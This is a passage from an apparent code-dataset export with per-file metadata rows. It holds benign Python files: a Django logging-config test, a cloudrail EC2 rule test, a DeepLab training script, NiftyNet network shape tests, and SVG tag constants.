"LOG_REMOTE_ACCESS": None,
"SERVER_NAME": "localhost",
"SERVER_PORT": "80",
"LOG_EXCLUDED_COMMANDS": excluded_commands,
"RAVEN_DSN": None,
"LOG_LEVEL": "DEBUG",
},
argv=["manage.py", "test"],
)
self.assertEqual(
{
"version": 1,
"disable_existing_loggers": True,
"formatters": {
"django.server": {
"()": "djangofloor.log.ServerFormatter",
"format": "%(asctime)s [localhost:80] %(message)s",
},
"nocolor": {
"()": "logging.Formatter",
"fmt": "%(asctime)s [localhost:80] [%(levelname)s] %(message)s",
"datefmt": "%Y-%m-%d %H:%M:%S",
},
"colorized": {"()": "djangofloor.log.ColorizedFormatter"},
},
"filters": {
"remove_duplicate_warnings": {
"()": "djangofloor.log.RemoveDuplicateWarnings"
}
},
"handlers": {
"mail_admins": {
"class": "djangofloor.log.AdminEmailHandler",
"level": "ERROR",
"include_html": True,
},
"syslog.warn": {
"class": "logging.handlers.SysLogHandler",
"level": "WARN",
"address": ("localhost", 514),
"facility": 1,
"socktype": socket.SOCK_DGRAM,
},
},
"loggers": {
"django": {"handlers": [], "level": "INFO", "propagate": True},
"django.db": {"handlers": [], "level": "INFO", "propagate": True},
"django.db.backends": {
"handlers": [],
"level": "INFO",
"propagate": True,
},
"django.request": {
"handlers": [],
"level": "DEBUG",
"propagate": True,
},
"django.security": {
"handlers": [],
"level": "INFO",
"propagate": True,
},
"djangofloor.signals": {
"handlers": [],
"level": "DEBUG",
"propagate": True,
},
"gunicorn.error": {
"handlers": [],
"level": "DEBUG",
"propagate": True,
},
"pip.vcs": {"handlers": [], "level": "INFO", "propagate": True},
"py.warnings": {
"handlers": [],
"level": "INFO",
"propagate": True,
"filters": ["remove_duplicate_warnings"],
},
"aiohttp.access": {
"handlers": [],
"level": "INFO",
"propagate": False,
},
"django.server": {
"handlers": [],
"level": "INFO",
"propagate": False,
},
"geventwebsocket.handler": {
"handlers": [],
"level": "INFO",
"propagate": False,
},
"gunicorn.access": {
"handlers": [],
"level": "INFO",
"propagate": False,
},
},
"root": {"handlers": ["syslog.warn", "mail_admins"], "level": "DEBUG"},
},
r,
)
def test_not_debug_config(self):
with tempfile.TemporaryDirectory() as tmp_dir:
r = self.config(
{
"DEBUG": False,
"DF_MODULE_NAME": "djangofloor",
"SCRIPT_NAME": "worker",
"LOG_DIRECTORY": tmp_dir,
"LOG_REMOTE_URL": None,
"LOG_REMOTE_ACCESS": None,
"SERVER_NAME": "localhost",
"SERVER_PORT": "80",
"LOG_EXCLUDED_COMMANDS": excluded_commands,
"RAVEN_DSN": None,
"LOG_LEVEL": None,
},
argv=["manage.py", "test"],
)
self.assertEqual(
{
"version": 1,
"disable_existing_loggers": True,
"formatters": {
"django.server": {
"()": "djangofloor.log.ServerFormatter",
"format": "%(asctime)s [localhost:80] %(message)s",
},
"nocolor": {
"()": "logging.Formatter",
"fmt": "%(asctime)s [localhost:80] [%(levelname)s] %(message)s",
"datefmt": "%Y-%m-%d %H:%M:%S",
},
"colorized": {"()": "djangofloor.log.ColorizedFormatter"},
},
"filters": {
"remove_duplicate_warnings": {
"()": "djangofloor.log.RemoveDuplicateWarnings"
}
},
"handlers": {
"mail_admins": {
"class": "djangofloor.log.AdminEmailHandler",
"level": "ERROR",
"include_html": True,
},
"djangofloor-worker.root": {
"class": "logging.handlers.RotatingFileHandler",
"maxBytes": 1000000,
"backupCount": 3,
"formatter": "nocolor",
"filename": os.path.join(
tmp_dir, "djangofloor-worker-root.log"
),
"level": "WARN",
},
"djangofloor-worker.access": {
"class": "logging.handlers.RotatingFileHandler",
"maxBytes": 1000000,
"backupCount": 3,
"formatter": "nocolor",
"filename": os.path.join(
tmp_dir, "djangofloor-worker-access.log"
),
"level": "DEBUG",
},
},
"loggers": {
"django": {
"handlers": [],
"level": "ERROR",
"propagate": True,
},
"django.db": {
"handlers": [],
"level": "ERROR",
"propagate": True,
},
"django.db.backends": {
"handlers": [],
"level": "ERROR",
"propagate": True,
},
"django.request": {
"handlers": [],
"level": "WARN",
"propagate": True,
},
"django.security": {
"handlers": [],
"level": "ERROR",
"propagate": True,
},
"djangofloor.signals": {
"handlers": [],
"level": "WARN",
"propagate": True,
},
"gunicorn.error": {
"handlers": [],
"level": "WARN",
"propagate": True,
},
"pip.vcs": {
"handlers": [],
"level": "ERROR",
"propagate": True,
},
"py.warnings": {
"handlers": [],
"level": "ERROR",
"propagate": True,
"filters": ["remove_duplicate_warnings"],
},
"aiohttp.access": {
"handlers": ["djangofloor-worker.access"],
"level": "INFO",
"propagate": False,
},
"django.server": {
"handlers": ["djangofloor-worker.access"],
"level": "INFO",
"propagate": False,
},
"geventwebsocket.handler": {
"handlers": ["djangofloor-worker.access"],
"level": "INFO",
"propagate": False,
},
"gunicorn.access": {
"handlers": ["djangofloor-worker.access"],
"level": "INFO",
"propagate": False,
},
},
"root": {
"handlers": ["djangofloor-worker.root", "mail_admins"],
"level": "WARN",
},
},
r,
)
def test_debug_config(self):
r = self.config(
{
"DEBUG": True,
"DF_MODULE_NAME": "djangofloor",
"SCRIPT_NAME": "worker",
"LOG_DIRECTORY": None,
"LOG_REMOTE_URL": None,
"LOG_REMOTE_ACCESS": None,
"SERVER_NAME": "localhost",
"SERVER_PORT": "80",
"LOG_EXCLUDED_COMMANDS": excluded_commands,
"RAVEN_DSN": None,
"LOG_LEVEL": None,
},
argv=["manage.py", "test"],
)
self.assertEqual(
{
"version": 1,
"disable_existing_loggers": True,
"formatters": {
"django.server": {
"()": "djangofloor.log.ServerFormatter",
"format": "%(asctime)s [localhost:80] %(message)s",
},
"nocolor": {
"()": "logging.Formatter",
"fmt": "%(asctime)s [localhost:80] [%(levelname)s] %(message)s",
"datefmt": "%Y-%m-%d %H:%M:%S",
},
"colorized": {"()": "djangofloor.log.ColorizedFormatter"},
},
"filters": {
"remove_duplicate_warnings": {
"()": "djangofloor.log.RemoveDuplicateWarnings"
}
},
"handlers": {
"mail_admins": {
"class": "djangofloor.log.AdminEmailHandler",
"level": "ERROR",
"include_html": True,
},
"stdout.info": {
"class": "logging.StreamHandler",
"level": "INFO",
"stream": "ext://sys.stdout",
"formatter": None,
},
"stderr.debug": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"stream": "ext://sys.stderr",
"formatter": None,
},
},
"loggers": {
"aiohttp.access": {
"handlers": ["stderr.debug"],
"level": "INFO",
"propagate": False,
},
"django": {"handlers": [], "level": "INFO", "propagate": True},
"django.db": {"handlers": [], "level": "INFO", "propagate": True},
"django.db.backends": {
"handlers": [],
"level": "INFO",
"propagate": True,
},
"django.request": {
"handlers": [],
"level": "DEBUG",
"propagate": True,
},
"django.server": {
"handlers": ["stderr.debug"],
"level": "INFO",
"propagate": False,
},
"django.security": {
"handlers": [],
"level": "INFO",
"propagate": True,
},
"djangofloor.signals": {
"handlers": [],
"level": "DEBUG",
"propagate": True,
},
"geventwebsocket.handler": {
"handlers": ["stderr.debug"],
"level": "INFO",
"propagate": False,
},
"gunicorn.access": {
"handlers": ["stderr.debug"],
"level": "INFO",
"propagate": False,
},
"gunicorn.error": {
"handlers": [],
"level": "DEBUG",
"propagate": True,
},
"pip.vcs": {"handlers": [], "level": "INFO", "propagate": True},
"py.warnings": {
"handlers": [],
"level": "INFO",
"propagate": True,
"filters": ["remove_duplicate_warnings"],
},
},
"root": {"handlers": ["stdout.info"], "level": "DEBUG"},
},
r,
)
def test_debug_config_error(self):
r = self.config(
{
"DEBUG": True,
"DF_MODULE_NAME": "djangofloor",
"SCRIPT_NAME": "worker",
"LOG_DIRECTORY": None,
"LOG_REMOTE_URL": None,
"LOG_REMOTE_ACCESS": None,
"SERVER_NAME": "localhost",
"SERVER_PORT": "80",
"LOG_EXCLUDED_COMMANDS": excluded_commands,
"RAVEN_DSN": None,
"LOG_LEVEL": "ERROR",
}
)
self.assertEqual(
{
"version": 1,
"disable_existing_loggers": True,
"formatters": {
"django.server": {
"()": "djangofloor.log.ServerFormatter",
"format": "%(asctime)s [localhost:80] %(message)s",
},
"nocolor": {
"()": "logging.Formatter",
"fmt": "%(asctime)s [localhost:80] [%(levelname)s] %(message)s",
"datefmt": "%Y-%m-%d %H:%M:%S",
},
"colorized": {"()": "djangofloor.log.ColorizedFormatter"},
},
"filters": {
"remove_duplicate_warnings": {
"()": "djangofloor.log.RemoveDuplicateWarnings"
}
},
"handlers": {
"mail_admins": {
"class": "djangofloor.log.AdminEmailHandler",
"level": "ERROR",
"include_html": True,
},
"stdout.info": {
"class": "logging.StreamHandler",
"level": "INFO",
"stream": "ext://sys.stdout",
"formatter": None,
},
"stderr.debug": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"stream": "ext://sys.stderr",
"formatter": None,
},
},
"loggers": {
"aiohttp.access": {
"handlers": ["stderr.debug"],
"level": "INFO",
"propagate": False,
},
"django": {"handlers": [], "level": "CRITICAL", "propagate": True},
"django.db": {
"handlers": [],
"level": "CRITICAL",
"propagate": True,
},
"django.db.backends": {
"handlers": [],
"level": "CRITICAL",
"propagate": True,
},
"django.request": {
"handlers": [],
"level": "ERROR",
"propagate": True,
},
"django.server": {
"handlers": ["stderr.debug"],
"level": "INFO",
"propagate": False,
},
"django.security": {
"handlers": [],
"level": "CRITICAL",
"propagate": True,
},
"djangofloor.signals": {
"handlers": [],
"level": "ERROR",
"propagate": True,
},
"geventwebsocket.handler": {
"handlers": ["stderr.debug"],
"level": "INFO",
"propagate": False,
},
"gunicorn.access": {
"handlers": ["stderr.debug"],
"level": "INFO",
"propagate": False,
},
"gunicorn.error": {
"handlers": [],
"level": "ERROR",
"propagate": True,
},
"pip.vcs": {
"handlers": [],
"level": "CRITICAL",
"propagate": True,
},
"py.warnings": {
"handlers": [],
"level": "CRITICAL",
"propagate": True,
"filters": ["remove_duplicate_warnings"],
},
},
"root": {"handlers": ["stdout.info"], "level": "ERROR"},
},
r,
)
| 38.566709
| 92
| 0.320144
| 1,584
| 30,352
| 6.028409
| 0.108586
| 0.089852
| 0.067861
| 0.065347
| 0.90533
| 0.896743
| 0.878312
| 0.861451
| 0.850141
| 0.839041
| 0
| 0.005539
| 0.54797
| 30,352
| 786
| 93
| 38.615776
| 0.690452
| 0
| 0
| 0.695709
| 0
| 0
| 0.289602
| 0.068595
| 0
| 0
| 0
| 0
| 0.007802
| 1
| 0.009103
| false
| 0.0013
| 0.009103
| 0
| 0.020806
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f06456d9313775c86c36b1e8171241200048ca38
| 4,285
|
py
|
Python
|
tests/knowledge/rules/aws/non_context_aware/performance_optimization/test_ensure_ec2_instance_ebs_optimized_rule.py
|
my-devops-info/cloudrail-knowledge
|
b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e
|
[
"MIT"
] | null | null | null |
tests/knowledge/rules/aws/non_context_aware/performance_optimization/test_ensure_ec2_instance_ebs_optimized_rule.py
|
my-devops-info/cloudrail-knowledge
|
b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e
|
[
"MIT"
] | null | null | null |
tests/knowledge/rules/aws/non_context_aware/performance_optimization/test_ensure_ec2_instance_ebs_optimized_rule.py
|
my-devops-info/cloudrail-knowledge
|
b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e
|
[
"MIT"
] | null | null | null |
import unittest
from cloudrail.dev_tools.rule_test_utils import create_empty_entity
from cloudrail.knowledge.context.aws.account.account import Account
from cloudrail.knowledge.context.aws.ec2.ec2_instance import Ec2Instance
from cloudrail.knowledge.context.aws.ec2.ec2_instance_type import EbsInfo, Ec2InstanceType
from cloudrail.knowledge.context.aws.aws_environment_context import AwsEnvironmentContext
from cloudrail.knowledge.rules.aws.non_context_aware.performance_optimization.ensure_ec2_instance_ebs_optimized_rule import \
EnsureEc2InstanceEbsOptimizedRule
from cloudrail.knowledge.rules.base_rule import RuleResultType
class TestEnsureEc2InstanceEbsOptimizedRule(unittest.TestCase):
def setUp(self):
self.rule = EnsureEc2InstanceEbsOptimizedRule()
def test_non_car_ec2_instance_is_ebs_optimized_fail(self):
# Arrange
ec2: Ec2Instance = create_empty_entity(Ec2Instance)
ec2_instance_type = Ec2InstanceType('t2.micro', EbsInfo('default', 'supported'))
account: Account = create_empty_entity(Account)
account.account = '11111111'
ec2.instance_type = 't3.micro'
ec2.ebs_optimized = False
context = AwsEnvironmentContext(ec2s=[ec2], accounts=[account], ec2_instance_types=[ec2_instance_type])
# Act
result = self.rule.run(context, {})
# Assert
self.assertEqual(RuleResultType.FAILED, result.status)
self.assertEqual(1, len(result.issues))
def test_non_car_ec2_instance_is_ebs_optimized__no_list_ebs_not_optimized__fail(self):
# Arrange
ec2: Ec2Instance = create_empty_entity(Ec2Instance)
ec2_instance_type = Ec2InstanceType('t2.micro', EbsInfo('default', 'supported'))
account: Account = create_empty_entity(Account)
account.account = '11111111'
ec2.instance_type = 't3.micro'
ec2.ebs_optimized = False
context = AwsEnvironmentContext(ec2s=[ec2], ec2_instance_types=[ec2_instance_type])
# Act
result = self.rule.run(context, {})
# Assert
self.assertEqual(RuleResultType.FAILED, result.status)
self.assertEqual(1, len(result.issues))
def test_non_car_ec2_instance_is_ebs_optimized__in_list__pass(self):
# Arrange
ec2: Ec2Instance = create_empty_entity(Ec2Instance)
ec2_instance_type = Ec2InstanceType('t2.micro', EbsInfo('default', 'supported'))
account: Account = create_empty_entity(Account)
account.account = '11111111'
ec2.instance_type = 't2.micro'
ec2.ebs_optimized = False
context = AwsEnvironmentContext(ec2s=[ec2], accounts=[account], ec2_instance_types=[ec2_instance_type])
# Act
result = self.rule.run(context, {})
# Assert
self.assertEqual(RuleResultType.SUCCESS, result.status)
self.assertEqual(0, len(result.issues))
def test_non_car_ec2_instance_is_ebs_optimized__not_in_list_optimized__pass(self):
# Arrange
ec2: Ec2Instance = create_empty_entity(Ec2Instance)
ec2_instance_type = Ec2InstanceType('t2.micro', EbsInfo('default', 'supported'))
account: Account = create_empty_entity(Account)
account.account = '11111111'
ec2.instance_type = 't3.micro'
ec2.ebs_optimized = True
context = AwsEnvironmentContext(ec2s=[ec2], accounts=[account], ec2_instance_types=[ec2_instance_type])
# Act
result = self.rule.run(context, {})
# Assert
self.assertEqual(RuleResultType.SUCCESS, result.status)
self.assertEqual(0, len(result.issues))
def test_non_car_ec2_instance_is_ebs_optimized__no_list__pass(self):
# Arrange
ec2: Ec2Instance = create_empty_entity(Ec2Instance)
ec2_instance_type = Ec2InstanceType('t2.micro', EbsInfo('default', 'supported'))
account: Account = create_empty_entity(Account)
account.account = '11111111'
ec2.instance_type = 't3.micro'
ec2.ebs_optimized = True
context = AwsEnvironmentContext(ec2s=[ec2], ec2_instance_types=[ec2_instance_type])
# Act
result = self.rule.run(context, {})
# Assert
self.assertEqual(RuleResultType.SUCCESS, result.status)
self.assertEqual(0, len(result.issues))
| 47.087912
| 125
| 0.715053
| 479
| 4,285
| 6.104384
| 0.152401
| 0.105335
| 0.082079
| 0.02223
| 0.819083
| 0.797196
| 0.797196
| 0.797196
| 0.765732
| 0.755814
| 0
| 0.036033
| 0.190432
| 4,285
| 90
| 126
| 47.611111
| 0.806861
| 0.021937
| 0
| 0.731343
| 0
| 0
| 0.047904
| 0
| 0
| 0
| 0
| 0
| 0.149254
| 1
| 0.089552
| false
| 0.044776
| 0.119403
| 0
| 0.223881
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b2fcea547a816596e5ece1e1ef169d8be84e9097
| 191
|
py
|
Python
|
Basics/ecommerce/app.py
|
caseysalvador/Python
|
19bc762a123e98ebbac427c69ce58925e507b045
|
[
"MIT"
] | null | null | null |
Basics/ecommerce/app.py
|
caseysalvador/Python
|
19bc762a123e98ebbac427c69ce58925e507b045
|
[
"MIT"
] | null | null | null |
Basics/ecommerce/app.py
|
caseysalvador/Python
|
19bc762a123e98ebbac427c69ce58925e507b045
|
[
"MIT"
] | null | null | null |
#from ecommerce.shipping import calc_shipping # first example of import
from ecommerce import shipping
#ecommerce.shipping.calc_shipping() # first example of import
shipping.calc_shipping
| 31.833333
| 72
| 0.827225
| 25
| 191
| 6.2
| 0.32
| 0.232258
| 0.219355
| 0.309677
| 0.412903
| 0.412903
| 0
| 0
| 0
| 0
| 0
| 0
| 0.120419
| 191
| 6
| 73
| 31.833333
| 0.922619
| 0.680628
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
65135f8bd9a8297fc1c021a2e3624b3e00552433
| 8,031
|
py
|
Python
|
train.py
|
MiseryForMe/MDC
|
470b2db76a71d7e4260de7e39e6cf9a61c80ca2b
|
[
"Apache-2.0"
] | null | null | null |
train.py
|
MiseryForMe/MDC
|
470b2db76a71d7e4260de7e39e6cf9a61c80ca2b
|
[
"Apache-2.0"
] | null | null | null |
train.py
|
MiseryForMe/MDC
|
470b2db76a71d7e4260de7e39e6cf9a61c80ca2b
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
import torch.nn.functional as F
import os
import os.path as osp
import time
import sys
import logging
import numpy as np
import argparse
import importlib
import json
import cv2
from lib.model import DeepLabLargeFOV
from lib.pascal_voc import PascalVoc
from lib.pascal_voc_aug import PascalVoc_Aug
from lib.transform import RandomCrop
from lib.optimizer import Optimizer
from lib.loss import *
from utils.logger import setup_logger
from evaluate import eval_model
from torchsummary import summary
batchsize = 16
torch.multiprocessing.set_sharing_strategy('file_system')
def get_args():
parser = argparse.ArgumentParser(description='Train a network')
parser.add_argument(
'--cfg',
dest = 'cfg',
type = str,
default = 'config/pascal_voc_aug_multi_scale.py',
help = 'config file for training'
)
return parser.parse_args()
def train(args):
## setup cfg and logger
spec = importlib.util.spec_from_file_location('mod_cfg', args.cfg)
mod_cfg = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod_cfg)
cfg = mod_cfg.cfg
cfg_str = json.dumps(cfg, ensure_ascii=False, indent=2)
if not osp.exists(cfg.res_pth): os.makedirs(cfg.res_pth)
setup_logger(cfg.res_pth)
logger = logging.getLogger(__name__)
logger.info(cfg_str)
device = torch.device('cuda:0')
## modules and losses
logger.info('creating model and loss module')
net = DeepLabLargeFOV(3, cfg.n_classes)
#for item in net.parameters():
# print(item.size())
net.train()
net.cuda()
if not torch.cuda.device_count() == 0: net = nn.DataParallel(net)
n_min = (cfg.crop_size**2) * cfg.batchsize // 16
criteria = OhemCELoss(0.7, n_min)
globloss = GlobLoss(0.7,n_min)
criteria.cuda()
#summary(net,(3,321,321))
## dataset
logger.info('creating dataset and dataloader')
ds = eval(cfg.dataset)(cfg, mode='train')
dl = DataLoader(ds,
batch_size = cfg.batchsize,
shuffle = True,
num_workers = cfg.n_workers,
drop_last = True)
## optimizer
logger.info('creating optimizer')
optimizer = Optimizer(
params = net.parameters(),
warmup_start_lr = cfg.warmup_start_lr,
warmup_steps = cfg.warmup_iter,
lr0 = cfg.start_lr,
max_iter = cfg.iter_num,
momentum = cfg.momentum,
wd = cfg.weight_decay,
power = cfg.power)
## train loop
loss_avg = []
st = time.time()
diter = iter(dl)
logger.info('start training')
max = 0
min = 0
mean = 0
for it in range(cfg.iter_num):
print('training')
try:
im, lb ,clb = next(diter)
if not im.size()[0] == cfg.batchsize: continue
except StopIteration:
diter = iter(dl)
im, lb = next(diter)
im = im.cuda()
lb = lb.cuda()#16,1,321,321
optimizer.zero_grad()
out,pred_c1,pred_c2,pred_c3,pred_c4,CAMs_1,CAMs_2,CAMs_3,CAMs_4,location_map,pred_mask = net(im)#out:16.21.321.321 pred:(16,21)
print(out.size())
lb = torch.squeeze(lb)
#false_mask = torch.from_numpy(false_mask)
loss = globloss(out,location_map,pred_mask,clb,pred_c1,pred_c2,pred_c3,pred_c4)
loss.backward()
optimizer.step()
loss = loss.detach().cpu().numpy()
loss_avg.append(loss)
## log message
if it%cfg.log_iter==0 and not it==0:
loss_avg = sum(loss_avg) / len(loss_avg)
ed = time.time()
t_int = ed - st
lr = optimizer.get_lr()
msg = 'iter: {}/{}, loss: {:.4f}'.format(it, cfg.iter_num, loss_avg)
msg = '{}, lr: {:4f}, time: {:.4f}'.format(msg, lr, t_int)
logger.info(msg)
st = ed
loss_avg = []
## dump model
model_pth = osp.join(cfg.res_pth, 'model_final.pkl')
net.cpu()
state_dict = net.module.state_dict() if hasattr(net, 'module') else net.state_dict()
torch.save(state_dict, model_pth)
logger.info('training done, model saved to: {}'.format(model_pth))
## test after train
if cfg.test_after_train:
net.cuda()
mIOU = eval_model(net, cfg)
logger.info('iou in whole is: {}'.format(mIOU))
def test(args):
## setup cfg and logger
spec = importlib.util.spec_from_file_location('mod_cfg', args.cfg)
mod_cfg = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod_cfg)
cfg = mod_cfg.cfg
cfg_str = json.dumps(cfg, ensure_ascii=False, indent=2)
if not osp.exists(cfg.res_pth): os.makedirs(cfg.res_pth)
setup_logger(cfg.res_pth)
logger = logging.getLogger(__name__)
logger.info(cfg_str)
device = torch.device('cuda:0')
## modules and losses
logger.info('creating model and loss module')
net = DeepLabLargeFOV(3, cfg.n_classes)
#for item in net.parameters():
# print(item.size())
net.eval()
net.cuda()
if not torch.cuda.device_count() == 0: net = nn.DataParallel(net)
n_min = (cfg.crop_size**2) * cfg.batchsize // 16
criteria = OhemCELoss(0.7, n_min)
globloss = GlobLoss(0.7,n_min)
criteria.cuda()
#summary(net,(3,321,321))
## dataset
logger.info('creating dataset and dataloader')
ds = eval(cfg.dataset)(cfg, mode='train')
dl = DataLoader(ds,
batch_size = cfg.batchsize,
shuffle = True,
num_workers = cfg.n_workers,
drop_last = True)
## optimizer
logger.info('creating optimizer')
optimizer = Optimizer(
params = net.parameters(),
warmup_start_lr = cfg.warmup_start_lr,
warmup_steps = cfg.warmup_iter,
lr0 = cfg.start_lr,
max_iter = cfg.iter_num,
momentum = cfg.momentum,
wd = cfg.weight_decay,
power = cfg.power)
## train loop
loss_avg = []
st = time.time()
diter = iter(dl)
logger.info('start training')
max = 0
min = 0
mean = 0
for it in range(cfg.iter_num):
print('training')
try:
im, lb ,clb = next(diter)
if not im.size()[0] == cfg.batchsize: continue
except StopIteration:
diter = iter(dl)
im, lb = next(diter)
im = im.cuda()
lb = lb.cuda()#16,1,321,321
optimizer.zero_grad()
out,pred_c1,pred_c2,pred_c3,pred_c4,CAMs_1,CAMs_2,CAMs_3,CAMs_4,location_map,pred_mask = net(im)#out:16.21.321.321 pred:(16,21)
print(out.size())
lb = torch.squeeze(lb)
#false_mask = torch.from_numpy(false_mask)
loss = globloss(out,location_map,pred_mask,clb,pred_c1,pred_c2,pred_c3,pred_c4)
loss.backward()
optimizer.step()
loss = loss.detach().cpu().numpy()
loss_avg.append(loss)
## log message
if it%cfg.log_iter==0 and not it==0:
loss_avg = sum(loss_avg) / len(loss_avg)
ed = time.time()
t_int = ed - st
lr = optimizer.get_lr()
msg = 'iter: {}/{}, loss: {:.4f}'.format(it, cfg.iter_num, loss_avg)
msg = '{}, lr: {:4f}, time: {:.4f}'.format(msg, lr, t_int)
logger.info(msg)
st = ed
loss_avg = []
## dump model
model_pth = osp.join(cfg.res_pth, 'model_final.pkl')
net.cpu()
state_dict = net.module.state_dict() if hasattr(net, 'module') else net.state_dict()
torch.save(state_dict, model_pth)
logger.info('training done, model saved to: {}'.format(model_pth))
## test after train
if cfg.test_after_train:
net.cuda()
mIOU = eval_model(net, cfg)
logger.info('iou in whole is: {}'.format(mIOU))
if __name__ == "__main__":
args = get_args()
train(args)
| 30.888462
| 135
| 0.604159
| 1,110
| 8,031
| 4.193694
| 0.191892
| 0.034372
| 0.015467
| 0.005156
| 0.829646
| 0.829646
| 0.829646
| 0.829646
| 0.829646
| 0.829646
| 0
| 0.022173
| 0.269954
| 8,031
| 259
| 136
| 31.007722
| 0.771789
| 0.071473
| 0
| 0.792079
| 0
| 0
| 0.079611
| 0.004858
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014851
| false
| 0
| 0.133663
| 0
| 0.153465
| 0.019802
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6523a710689873c0a317852bfe72e49485ff06f0
| 2,522
|
py
|
Python
|
tests/interventional_hybrid_net_test.py
|
elias-1/NiftyNet
|
05cd2ffbff5043d9a40b524a6d72f6bd5cd072d2
|
[
"Apache-2.0"
] | 6
|
2018-10-18T15:36:52.000Z
|
2021-03-03T18:39:41.000Z
|
tests/interventional_hybrid_net_test.py
|
elias-1/NiftyNet
|
05cd2ffbff5043d9a40b524a6d72f6bd5cd072d2
|
[
"Apache-2.0"
] | 9
|
2020-11-13T19:08:08.000Z
|
2022-02-10T02:25:56.000Z
|
tests/interventional_hybrid_net_test.py
|
elias-1/NiftyNet
|
05cd2ffbff5043d9a40b524a6d72f6bd5cd072d2
|
[
"Apache-2.0"
] | 2
|
2018-05-13T14:54:48.000Z
|
2018-05-26T16:08:09.000Z
|
from __future__ import absolute_import, print_function
import tensorflow as tf
from niftynet.network.toynet import ToyNet
from niftynet.network.interventional_hybrid_net import INetHybridPreWarp, INetHybridTwoStream
class INetHybridPreWarpTest(tf.test.TestCase):
def test_3d_shape(self):
input_shape = (2, 32, 32, 32, 1)
x = tf.ones(input_shape)
hybridnet_instance = INetHybridPreWarp(1e-6)
out = hybridnet_instance(x, x, is_training=True)
print(hybridnet_instance)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
out = sess.run(out)
self.assertAllClose((2, 32, 32, 32, 3), out[0].shape)
self.assertAllClose((2, 32, 32, 32, 3), out[1].shape)
def test_2d_shape(self):
input_shape = (2, 32, 32, 1)
x = tf.ones(input_shape)
hybridnet_instance = INetHybridPreWarp(1e-6)
out = hybridnet_instance(x, x, is_training=True)
print(hybridnet_instance)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
out = sess.run(out)
self.assertAllClose((2, 32, 32, 2), out[0].shape)
self.assertAllClose((2, 32, 32, 2), out[1].shape)
class INetHybridTwoStreamTest(tf.test.TestCase):
def test_3d_shape(self):
input_shape = (2, 32, 32, 32, 1)
x = tf.ones(input_shape)
hybridnet_instance = INetHybridTwoStream(1e-6)
out = hybridnet_instance(x, x, is_training=True)
print(hybridnet_instance)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
out = sess.run(out)
self.assertAllClose((2, 32, 32, 32, 3), out[0].shape)
self.assertAllClose((2, 32, 32, 32, 3), out[1].shape)
self.assertAllClose((2, 32, 32, 32, 3), out[2].shape)
def test_2d_shape(self):
input_shape = (2, 32, 32, 1)
x = tf.ones(input_shape)
hybridnet_instance = INetHybridTwoStream(1e-6)
out = hybridnet_instance(x, x, is_training=True)
print(hybridnet_instance)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
out = sess.run(out)
self.assertAllClose((2, 32, 32, 2), out[0].shape)
self.assertAllClose((2, 32, 32, 2), out[1].shape)
self.assertAllClose((2, 32, 32, 2), out[2].shape)
if __name__ == "__main__":
tf.test.main()
| 33.626667
| 93
| 0.622522
| 331
| 2,522
| 4.561934
| 0.163142
| 0.055629
| 0.046358
| 0.139073
| 0.824503
| 0.824503
| 0.824503
| 0.824503
| 0.806623
| 0.787417
| 0
| 0.063898
| 0.255353
| 2,522
| 74
| 94
| 34.081081
| 0.740149
| 0
| 0
| 0.814815
| 0
| 0
| 0.003172
| 0
| 0
| 0
| 0
| 0
| 0.185185
| 1
| 0.074074
| false
| 0
| 0.074074
| 0
| 0.185185
| 0.092593
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e8eba1e05b9b97d717cf89d471e77d5157a7c75d
| 102
|
py
|
Python
|
devtools/svg/tags.py
|
gianmaria/nothing
|
a423ce126e2437d89c6b30a9929004da87ea6280
|
[
"MIT"
] | null | null | null |
devtools/svg/tags.py
|
gianmaria/nothing
|
a423ce126e2437d89c6b30a9929004da87ea6280
|
[
"MIT"
] | null | null | null |
devtools/svg/tags.py
|
gianmaria/nothing
|
a423ce126e2437d89c6b30a9929004da87ea6280
|
[
"MIT"
] | null | null | null |
RECT_TAG_NAME = '{http://www.w3.org/2000/svg}rect'
TEXT_TAG_NAME = '{http://www.w3.org/2000/svg}text'
| 34
| 50
| 0.705882
| 20
| 102
| 3.4
| 0.5
| 0.205882
